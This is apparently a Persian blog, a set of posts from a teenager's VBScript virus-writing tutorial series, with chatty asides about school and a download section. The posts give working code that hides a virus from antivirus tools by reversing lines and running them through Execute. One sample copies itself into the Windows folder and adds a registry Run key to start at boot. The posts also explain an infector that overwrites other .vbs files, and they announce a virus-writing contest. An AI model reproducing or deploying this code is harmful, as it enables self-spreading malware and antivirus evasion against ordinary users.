سلام. قرار بود که ادامه بحث Encrypting رو داشته باشیم اما خیلی از بچه ها میل یا آفلایل گذاشته بودن که روش اول رو خوب متوجه نشدم. منم برای رفع این مشکل خودم کدی نوشتم که تمام کارهارو براشون انجام بده و دیگه نیازی به دونستن روش هم نبود. اما بخاطر محدودیت های پرشین بلاگ مثل اینکه از این کد نمیشه مستقیما تو وبلاگ استفاده کرد. اگر فکر می کنید به این کد احتیاج دارید آدرس ایمیلتون رو بدید تا براتون میل کنم. اما حالا یه توضیح کوچیکی هم در مورد همون روش اول می دم.

فرض کنید شما کدی دارید مثل زیر:

MsgBox "Pasargad"

و حالا می خاید با استفاده از روش اول اونو encrypt کنید. در این روش ابتدا باید همه خطوط برعکس بشن. که کد بالا هم به "dagrasaP" xoBgsM تبدیل میشه. بعد همه خطوط رو در کد اصلی قرار می دیم و اول هر خط هم یک کاراکتر " ' " قرار می دیم تا به عنوان توضیحات حساب بشن و با اجرای کد خطایی رخ نده. بعد در کد اصلی (کد اصلی کدی یه که متن ویروسمون به صورت encrypt شده به همراه یک الگوریتم برای decrypt کردن در اون قرار می گیره!) الگوریتمی می نویسیم تا به همون تعداد خطی که برعکس کردیم و در اول فایل قرار دادیم? از بالا شروع به خوندن خط ها بکنه و کاراکتر اول هر خط رو که همون " ' " رو حذف کنه و بعد اون رو برعکس کنه و بعد از انجام اینکار و برگردوندن همه خطوط به حالت اولیه (یعنی کاراکتر اول رو پاک کنه و اون رو برعکس کنه) اون ها رو در تابع Execute قرار می ده که مخصوص اجرا کردن فرامین ویبی اسکریپت هست. به این ترتیب می شه اینطور تصور کرد که متن ویروس ما در زمان اجرا ایجاد و اجرا میشه و تا زمانی که Encrypt نشده باشه توسط انتی ویروس ها قابل شناسایی نیست! می دونم توضیحات من خیلی مبهمه!!! ولی چه میشه کرد قضیه به کل پیچیدس سعی خودتون رو بکنید و اگر هم موفق نشدید می تونید از کدی که خودم نوشتم استفاده کنید.

سلام. تو این چند وقت چندتا از بچه ها کدهایی رو فرستاده بودن و گفته بودن که چطوری می اینارو Encrypt کرد!! خوب ما هم اینجا داریم همینو آموزش می دیم ولی این پست رو برای کسایی نوشتم که واقعا رفتن روش ها رو امتحان کردن و حالا ممکنه به دلایلی موفق نشده باشن!؟!. خوب برای کسایی که کدی دارن و موفق نشدن تا اونو encrypt کنن یه کد کوچولو نوشتم که این کارو براشون بکنه! کدی که می خواید encrypt شه رو این زیر کپی کنید و دکمه رو فشار بدید بعد کد encrypt شده آماده برای اجرا دوباره تو همین جعبه متنی قرار می گیره و میتونید اونو کپی کنید . با پسوند vbs ذخیره کنید و اجراش کنید. فقط اینکه تو این کد از شئی FileSystemObject خودمون استفاده شده برای همین بافشار دادن دکمه یه پیام ضاهر می شه که بلی یا خیر می خواد شما بلی رو فشار بدید. البته بازم به علت استفاده از همین شکل کسایی که ویروس یاب دارن ممکنه پیامی براشون ضاهر بشه که بگه ممکن در حال اجرای ویروسی هستند. (همون سخت گیری های همیشگی این AV های نفهم).

' VBS Encryptor Created by [PaSarGaD] <br>on error resume next <br>Dim Fso, fil <br>Set fso = CreateObject("Scripting.FileSystemObject") <br>Set fil = fso.OpenTextFile(wscript.scriptfullname) <br>for I=1 to || //تعداد خطوط رو خودتون تغییر بدید <br> buf = Fil.ReadLine <br> buf2= StrReverse(buf) <br> buf3= Mid(buf2, 1, Len(buf2)-1) <br> all = all& ":" & buf3 ' <br>next <br>fil.Close() <br>pasargad = Mid(all, 2, len(All)-1) <br>execute(pasargad)

سلام، اول از همه تبریک و تسلیت می گم به ارازل سوم ریاضی مدرسه شهید کلهر سینه آهنی به خاطر عوض شدن معلم عربیشون (آخه یکی نیت بگه این موقع سال مگه وقت این ک* کلک بازیاست!). و دوم بخاطر هَووی جدید معلم شیمی قبلی شون (آقای شیبابا) که واقعا باعث خوشحالی جمع کسیری از این ارازل ارجمند شده (بابا مردک درس نمی داد که! اما شیبابا کجایی ببینی قایمکی دارن می کنن تو پاچت!). ارازل سوم ریاضی امیدوارم همین کافی باشه

در مورد متن بالا باید بگم شرمنده می دونم جاش تو وبلاگ نیست ولی به خدا اگه نمی گفتم عقده می شد. تازه با بچه ها قراره این خبرو بزاریم صفحه اول یاهو! (آخه مثلا قراره معلم قبلیه نفهمه!) .

اه اه چند وقته بخاطر این مقالات مضخرفی که می نویسم از خودم بدم اومده. اما امروز اومدم که بنویسم (اونم تا دسته!). قسمت یازدهم ویروس نویسی رو ادامه می دیم با توضیح تابع ()Checker. اما می دونید چیه یه؟ مثل اینکه یه سوتی کوچیک دادم. در قسمت دهم ویروس نویسی در تابع ()DoSearch پس از اینکه فایل با پسوند vbs پیدا شد باید مسیر اونو در تابع ()Checker (که الان می گم) قرار بدیم نه در تابع ()Infector. خلاصه خودتون یجوری متوجه سوتی ما بشید دیگه! پیش میاد :

خط اول که باعث اعلان تابعی به نام ()Checker با متغیری به نام Path (که همون مسیر فایل با پسوند vbs هستش) به عنوان ورودی تابع می شه. در خط دوم با استفاده از متد OpenTextFile از شئی Fso این فایل vbs رو درست مثل یه فایل متنی باز می کنیم و Object اون رو در متغیری به نام VbFile قرار می دیم. در خط بعد با استفاده از متد ReadAll از این شئی متن موجود در این فایل رو در متغیر VbText قرار می دیم. در خط بعد با استفاده از تابع InStr (چک می کنه که آیا یه رشته در رشته دیگه ای وجود داره یا نه و در صورتی که وجود نداشته باشه مقدار ? رو برمی گردونه) چک می کنیم که آیا این فایل قبلا آلوده شده یا نه! حالا به چه صورت؟ خوب اگر توجه کنید ما یه Comment در آخر این کد قرار دادیم (در VBScript کامنت رو بعد از علامت " ' " می نویسن). این کامنت "Pasargad" مثل یه کلید عمل می کنه! ما در متن فایل پیدا شده دنبال این کلمه کلیدی می گردیم اگر پیدا نشد یعنی فایل قبلا آلوده نشده! اونوقت ما با استفاده از کد خط ششم که متد CopyFile از شئی Fso هستش فایل ویروسمون رو بجای فایل vbs پیدا شده قرار کپی می کنیم. که در این صورت اگر بار دیگه این فایل رو چک بکنیم حتما کلمه "Pasargad" توش هست و از کپی مجدد جلو گیری می شه! چند خط آخر کد هم که دیگه تابلوست.

خوب می دونید چرا اینقدر سریع توضیح می دم؟ برای اینکه متوجه شدم ماشاالله همه حرفه ای هستند و این مطالب براشون مثل آب خوردنه برای همین دارم کاری می کنم که آموزش خود ویروس زودتر تموم شه و برسیم به ترفندهایی که در این ویروس ها میشه بکار برد!! از آموزش خود ویروس هم فقط تابع ()Mailer (باعث پراکنده شدن ویروس از طریق ایمیل میشه) باقی مونده که اونم خوراک مقاله بعدیه . خدارو شکر مثل اینکه دیگه تموم شد!!! ‌ «یا علی»

سلام. تو پست قبلی درباره یکی از روش های مخفی سازی ویروس یا در اصل Virus Code Encryption (از این به بعد با همین اصتلاح کار می کنیم) توضیح دادم که تقریبا روش خوبی بود. اما بزارید یه سری روش های دیگه رو هم که معمولا در Encrypt سازی ویروس ها از اونا استفاده می شه معرفی کنیم.

خوب فکر کنم با دیدن مثال قبلی (تو پست قبل)‌ متوجه شده باشید که اصل ساختار Encrypting (به رمز درآوردن) به چه صورته. ابتدا کد ویروس رو به روش ها مختلف Encrypt می کنیم بعد کدی می نویسیم که با هر بار اجرای ویروس کد Encrypt شده رو Decrypt (از حالت رمزی خارج کردن) کنه و با استفاده از فرمان Execute اونو اجرا کنه حالا سایر روش های Encrypt سازی.

ببینید بیاید در این مرحله اصلا فکر کنیم که نمی خایم کد vb رو Encrypt کنیم. مثلا فکر کنید می خایید نامه ای رو که به دوستتون نوشتید رمزی کنید ( ای کلک)? خوب حالا چکار می کنید؟ یه روش اینکه تمام حروف رو یکی ببرین جلو مثلا "honey" تبدیل میشه به "ipofz"? درسته بقول معروف روش ازگل هاست ولی حتی استفاده از همین روش هم AV ها رو عاجز می کنه. بزارید یکم عملی ترش کنیم:

روش جمع/تفریق:
این روش شبیه همون روش بالاست یعنی مثلا حروف یک رشته رو یک یا هرچندتا که بخایم جلو یا عقب ببریم. دیگه فکر کنم اینقدر حرفه ای هستید که فقط نشون دادن مثال کافی باشه:

این کد مقدار اسکی هر حرف از رشته OldString را به اندازه ?? واحد افزایش می دهد و آن را در متغییر NewString قرار می دهد. در پایان حلقه مقدار رشته NewString (مثلا یه چیزی مثل)? "ی?…??÷ا لت?ه?»غ" خواهد شد. مشکل این روش این است که روال عملیات Encryption با روال Decryption متفاوت است. یعنی برای از رمز در آوردن رشته جدید باید از روال زیر استفاده کنیم:

این روال رشته ما رو دوباره به صورت "This is a test!" در خواهد آورد. (ایندفه ?? تا کم می کنه) البته شما می تونید از مقادیر بیشتر یا کمتری برای اضافه یا کم کردن استفاده کنید اما بخاطر داشته باشید که مقادیر اسکی از ? تا ??? هستند و اگر مثلا شما مقدار اسکی کاراکتر "A" رو که ?? هست بعلاوه ??? یا منهای ?? بکنید از این محدوده خارج شدید و باعث ایجاد خطا هنگام اجرای برنامتون می شید.

فکر نمی کنم سخت باشه و فقط با یبار دوره میتونید اصلا خودتون یه همچین مقاله آموزشی بنویسید . ایندفه خیلی طولانی شد!! ولی هنوز حرفه ای ترین روش مونده که ایشاالله مقاله بعدی.

سلام. شرمنده از وقفه ای که پیش اومد ولی چه میشه کرد دیگه! . خوب داشتیم رو روش های encrypt سازی کار می کردیم و حالا روش بعدی:

روش XOR:

میشه گفت این روش رو بسیاری از ویروس های نرمال asm هم برای encrypt سازی خودشون استفاده می کردند و تقریبا بهترین و شناخته شده ترین روشه! باید بگم xor هم یه عملونده درست مثل + یا - و تقریبا تو تمام زبون های برنامه نویسی هم وجود داره. اما قسمت سخت کار درک روش کار این عملونده! به این عبارت توجه کنید:

5 XOR 3 = 6

خوب همینه دیگه! اگر هیچ اطلاعاتی در مورد نحوه کار این عملوند نداشته باشید عمرا نتونید متوجه بشید بین ? و ? چه رابطه ای هست که بشه ?!!!! در واقع این عملوند با معادل های باینری اعداد یا حروف کار می کنه (اگر باینری بلد نیستید هم خیالی نیست). و همونطوری که باید/شاید بدونید باینری ها فقط از ? و ? تشکیل میشن. مثلا معادل باینری ? = ???????? و معادل سه = ????????. با این توضیحات یه نگاه دیگه بندازید:

0 0 0 0 0 1 0 1 معادل سه
0 0 0 0 0 0 1 1 XOR معادل پنج
==========
0 0 0 0 0 1 1 0 معادل شش

خوب حالا دیگه شاید به رابطش پی برده باشید!! وقتی که عملوند XOR روی دو باینری تاثیر می زاره همونطور که در بالا می بینید اگر هردو بیت ? باشند بیت جواب هم ? میشه. اگر یکی از بیت ها ? و دیگری ? باشه بیت جواب ? خواهد شد ولی اگر هر دو بیت ? باشه بیت جواب ? خواهد شد (در ضمن این کار رو باید با هر ? تا بیت انجام بدیم)! خوب اگر به شماتیک بالا نگاه کیند می بینید که طبق توضیح پنچ تا بیت اول (ما از چپ شروع می کنیم) که در هر دو باینری ? بوده پنج تا ? در باینری جواب بوجود آورده. در بیت ششم و هفتم هم یکی ? و یکی ? داشته پس جواب در هر دو حالت ? میشه. اما بیت هشتم هر دو باینری ? هست پس بیت هشتم باینری جواب ? خواهد شده. و حالا ???????? مقدار باینری معادل ? هستش (بازم می گم لازم نیست شما مقدار باینری معادل هر عدد یا حروفی رو بدونید!)

خوب حالا این چه ربطی داشت؟ (تو قسمتای بعدی می گم )

سلام بچه ها. قراره از امروز آموزش مخفی سازی ویروس vbs رو از دست AV ها داشته باشیم. اما اول یکم توضیح:

در واقع زیاد شدن و رایج بودن و قدرت بالای تخریب ویروس های vbs باعث شده که AVs (آنتی ویروس ها) در تشخیص اونا یکم زیاده روی کنن به طوری که بعضی وقتا به بعضی فایل های vbs عادی هم گیر ? پیچ می دن . طرز شناسایی این ویروس ها توسط AVs درست مثل کدهای استفاده شده در خود اونا تابلوست. یعنی چی؟ خوب مثلا اکثر این ویروس ها از این فرمان CreateObject("Scripting.FileSystemObject") i در کد خودشون استفاده می کنن. خوب ویروس یاب ها هم از فرصت اشتفاده می کنن و هر فایلی که محتوی این فرمان و چند فرمان تابلوی دیگه باشه رو به عنوان ویروس شناسایی می کنن (زحمت می کشن). ما هم برای اینکه سر اونا رو گول بمالیم چکار می کنیم؟ بله بدترین نظر اینکه بگیم باید بی خیال این فرمان های شد و...

در این مقاله و یکی دو تای آینده می خوام چند روش برای مخفی سازی vbs ها معرفی کنم که تمامشون توسط افراد می شه گفت حرفه ای (KaGra=Bridga virii group, jackie=LineZer0 group) امتحان شدن و کار می کنن و استفاده از هرکدومشون کد شما رو ???? غیرقابل شناسایی می کنه!!

روش اول اینقدر سادس که فکر کنم اگر توضیحات رو تو خود کد بگم کافی باشه فقط بگم اجرای این کد باعث میشه تا ویروس خودشو در شاخه ویندوز کپی کنه و با تغییر در رجیستری با هر بار بالا امدن ویندوز اجرا بشه.

' Method by KaGara' <br>' In http://viri.persianblog.com' <br>'txen emuser rorre no <br>')"tcejbOmetsySeliF.gnitpircS"(tcejbOetaerC = OSF tes <br>')redloFswodniW(redloFlaicepSteG.OSF = riDypoC <br>'"sbv.xco.23glDmoC\" + riDypoC = htaPV <br>')"llehS.tpircSW"(tcejbOetaerC = llehShsW teS <br>'"ZS_GER" ,"% " + htaPV +" exe.tpircsw" ,"23GLDMOC\nuR\noisreVtnerruC\swodniW\tfosorciM\ERAWTFOS\MLKH" etirWgeR.llehShsW <br>'htaPV ,emaNlluFtpircS.tpircSW eliFypoC.OSF <br>on error resume next <br>Set fso = CreateObject("Scripting.FileSystemObject") <br>Set fil = fso.OpenTextFile(wscript.scriptfullname) <br> <br>for I=1 to 8 <br> buf = Fil.ReadLine 'خط به خط می خونه <br> buf2= StrReverse(buf) 'هر خط رو برعکس می کنه <br> buf3= Mid(buf2, 1, Len(buf2)-1) <br> ' کاراکتر اضافی "'" ته هر خط رو پاک می کنه <br> all = all& ":" & buf3 ' تمام خطوط رو کنار هم می زاره <br>next <br>fil.Close() <br>pasargad = Mid(all, 2, len(All)-1) <br>'کاراکتر اول رشته رو پاک می کنه <br>execute(pasargad) ' رشته داده شده رو اجرا می کنه

خوب دیدید چقدر سادس!! فقط باید بگم در vbs اگر بخواید چندتا فرمان رو تو یه خط بنویسید باید اونا رو با کاراکتر ":" از هم جدا کنید. و همچنین فرمان execute که همه این روش ها بر مبنای این تابع بوجود می یان? رشته ورودی رو که یکسری فرمان vbs باید باشه رو اجرا می کنه مثلا Execute(" a=100: b=200: msgbox a+b")i یه مسیج باکس با متن ??? نمایش می ده. همچنین باید بگم تو این روش شما نباید در کد خودتون از فرمان execute() استفاده کنید چون دوتا فرمان execute تو در تو باعث ایجاد خطا می شه. مثلا: execute(execute(buffer))i دستور buffer رو اجرا نخواهد کرد.

خوب دیگه خیلی طولانی شد! اما دفعه بعد با یه روش دیگه که خیلی جالبتر و علمی تر و ... تر هست در خدمتتون خواهم بود. در ضمن ممنون می شم اگر بهم بگید که آیا قسمت نظر خواهی وبلاگم تو سیستم شما هم اشکال داره یا نه؟

سلام. اوشاخلرین یاخچیدی؟ (یعنی بروبچز حالتون خوبه؟ )

وای چه حالی میده آدم درحالی بنویسه که حداقل بدونه تا ?? روز آینده هیچ دغدغه فکری مثل مدرسه و امتحانو کلاس و ... نداره. آره دیگه بالاخره زمان غیبت کبری ما هم به سر رسید و در اولین فرصت اومدم تا در خدمت شما باشم. یه سری برنامه های جدید داشتم مثلا می خواستم قالب وبلاگ رو بکل عوض کنم و ... ولی با یکم تغییرات جزئی سر و ته قضیه رو هم آوردم و خلاصه از این حرفا.

خیلی ممنونم چون با اینکه گفته بودم خودتونو زحمت ندین و تا یه ماه آینده به وبلاگم سرنزنید (آپدیت نمی شد)‌بازم دست کم ?? ?? نفر در روز برای تفریح هم که شده یه بار وبلاگ ما رو باز می کردن (اینو می گن طرفدار پروپا قرص).

می دونید امروز ? تا امتحان دادم یه نفر هم بدجور حالمو گرفته (نوبت ما هم میشه ) برای همین الان به زور چشمامو باز نگه داشتم. خدائیش خیلی خسته ام. اما قول می دم از پست بعدی روش مخفی کردن ویروس رو آموزش بدم. پس تا فردا یا پس فردا بای .

بروبچز سلام!!! آره بابا خودمم می دونم این دیر اومدنای ما هم دیگه اعصاب همه رو خرد کرد! اما می دونید که هر وقت اینترنتم تموم بشه همین بساطه با این تفاوت که ایندفه چندتا فیلم مشتی (سینما) هم خورده بود به تورمون و دیگه خلاصه کلی طول کشید پولامونو جمع کنیم . ولی جاتون خالی فیلماش خیلی حال دادن مخصوصا اینکه با بروبچز با هم بودیم. راستی اگر هستین قرار بزارین یه روز دسته جمعی بریم یه فیلم مشتی بزنیم (هستین؟) .

همونطوری که اکثر بروبچز خبر دارین یواش یواش امتحانات داره شروع میشه و بالاخره دارم حس می کنم بجز وبگردی و سینما رفتن کارای دیگه ای هم هست که انجامش ثواب داره (درس خوندنو می گما!). برای همین اومدم از تمام شما معذزت بخوام و خواهش کنم تو این چندوقت ? اگر براتون ممکنه وقت گرونبهای خودتونو با وبلاگ ما تلف نکنید چون فکر نکنم به این زودیا آپدیت کنم. اینجوری هم شما الاف ما نمی شید هم اینکه ما شرمنده شما نمی شیم!!! خیلی ممنون از لطفتون. فعلا بای تا بازگشت دوباره .

«یا حق»

سلام. آقایون? خانما مژده!!! بله دیگه بالاخره این بخش دانلود وبلاگ ما هم راه افتاد! علت طول کشیدنش هم این بود که اولا می خواستم طراحی کل قسمتاشو خودم بکنم (حالا انگار چکار کردم!). دوم اینکه بالاخره باید یه چندتا از برنامه های خودمونم توش قرار می دادیم یا نه! برای همین حول حولکی یه چندتا برنامه مفنگی هم زدیم تنگش. اما خداییش دست مریزاد می گم به برو بچزی که لطف کردن و برنامه هاشون رو برای من فرستادن! دیدین حالا! فکر کردین دارم شوخی می کنم. ولی حالا که برنامه هاشون رو گذاشتم برای دانلود دلتون بسوزه!
حالا اگر گفتین کجاست؟ نه بابا این بغل مغلا دنبالش نگردین! بابا همین بالاست دیگه! کنج صفحه دست چپ رو یه نگاه بندازید. روی عکسی که این کنار نشون دادم کلیک کنید تا این قسمت دانلود افسانه ای ما نمایش داده بشه!. چندتا برنامه اول کار خودمه ? اما همونطور که گفتم حول حولکی شدن پس آگاه باشید که پر از اشکالات خفنند! بقیه هم محصول تلاش سایر بروبچز ایرونیه! اگر ماوس رو رو هر لینک چند ثانیه نگه دارید اطلاعاتی مثل سایز? برنامه نویس و... هر فایل نشون داده میشه. در ضمن این قسمت دانلود ما هم چون طراحیش کار خودمه مثل برنامه هام ممکنه چندتا اشکال داشته باشه اگر به مشکلی برخوردید خیلی لطف می کنید اگر مارو هم خبر کنید. Baghdadi_n@hotmail.com
راستی اگر برنامه جدیدی نوشتید. حتما برام بفرستید (به همراه لینکش) تا براتون بزارم تو قسمت دانلود. (ضرر که نداره من از خدامه یکی با برنامه های من اینکارو کنه!)

و اما در مورد بحث شیرین ویروس نویسی!! ماشاالله هزار ماشاالله می بینم که جوانان ویروس نویس روز به روز دارن بیشتر میشن و خلاصه به گوش ما رسیده که آره دیگه!! آموزشات مفنگیه و از این حرفا! خوب اشکال نداره از بحث ویروس نویسی یه قسمت دیگه بیشتر نمونده بود که اونم ارسال ویروس به ایمیل های موجود آدرس لیست Outlook بود. اما حالا که همه بلدید چطوری ما هم میریم سراغ یه موضوع شیرین تر! اصلا می دونید چیه از همون وقتی که آموزشای ویروس نویسی رو شروع کردم لحضه شماری می کردم برای یه همچین موقعی! می دونید می خوام چکار کنم؟

یه مسابقه!!!!!

آره دیگه یه مسابقه ویروس نویسی بین بروبچز پروگرامر حرفه ای و نیم حرفه ای و تازه کار اونم با هر زبونی! جزئیات مسابقه رو در مقاله بعدی می گم فعلا فقط نظراتتون رو بگید که آیا الان آمادگی اینکارو دارید یا نه؟ شاید بعضی ها هنوز احساس می کنن هیچی بلد نیستن! «یا حق»